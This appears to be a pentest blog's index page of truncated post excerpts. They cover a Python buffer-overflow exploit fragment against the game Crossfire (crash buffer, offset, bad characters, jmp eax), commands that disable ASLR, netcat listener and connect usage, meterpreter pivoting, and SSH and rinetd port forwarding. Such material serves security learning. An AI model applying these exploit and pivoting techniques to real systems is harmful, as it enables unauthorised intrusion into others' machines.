host = "127.0.0.1"
crash = "\x41" * 4379
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"
#add eax, 12 = 83C00C
#jmp eax = FFE0
#creates a bi...
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
# verify "0"
ulimit -c unlimited
badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" +
There are many distributions of linux, and they all do things a little different regarding default security and built-in tool sets. Which means when engaging these different flavors during a pentest, what works against one linux target to get an interactive shell, may not work against another. Well, not to worry my friends, there are many technique...
The amazing netcat, used for so many fantastic things. If you’re learning the basics of penetration testing look into this tool inside out.
Connect to a TCP Port
nc -nv <IP Address> <Port>
Listen on a TCP Port
nc -lvp <port>
Connect and receive a HTTP Page
nc -nv <IP Address> 80
HEAD / HTTP...
Once a meterpreter shell is obtained on a system a larger range of options is available to the Penetration Tester for accessing the system. In a hypothetical scenario the victim is running a vulnerable mail server on port 25, and we have a remote exploit we wish to use against it. Unfortunately for us it’s behind a firewall. After getting a meter...
Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense it matters who is initiating the connection, and who the destination server is. I’ll run through local port forwarding here, and in a seperate page, cover remote forwardin...
Port forwarding can be one of the more confusing aspects of pivoting between machines and networks. Both remote and local SSH forwarding can be even more confusing in the sense it matters who is initiating the connection, and who the destination server is. I’ll run through remote port forwarding here, and in a seperate page, cover local forwardin...
SSH is fantastic for port redirection in a lot of cases, but what if you want to set up a redirection of incoming and outgoing ports without the hassle of setting up SSH servers? Rinetd is a great program that will let you do this.
[Linux Download] http://www.boutell.com/rinetd/http/rinetd.tar.gz
[Windows Download] http://www...